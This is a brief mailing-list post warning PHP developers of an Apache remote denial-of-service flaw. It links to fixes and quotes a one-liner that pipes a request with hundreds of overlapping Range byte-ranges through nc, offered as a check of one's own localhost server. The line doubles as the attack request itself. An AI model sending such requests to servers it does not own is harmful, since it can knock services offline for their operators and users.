[Phpwm] Apache DoS vulnerability

[David Goodwin]

It appears Apache vulnerable to a remote denial of service request.

There is some discussion and fixes on https://lwn.net/Articles/456268/


I've seen the following posted which might be useful in identifying vulnerable servers -


 /bin/echo -en "HEAD / HTTP/1.1\r\nHost:localhost\r\nRange:bytes=0-,$(perl -e 'for ($i=1;$i<1300;$i++) { print "5-$i,"; }')5-1300\r\nAccept-Encoding:gzip\r\nConnection:close\r\n\r\n" | nc localhost 80

 If the response size is ~90k you're vulnerable. (via: http://seclists.org/fulldisclosure/2011/Aug/175)



David.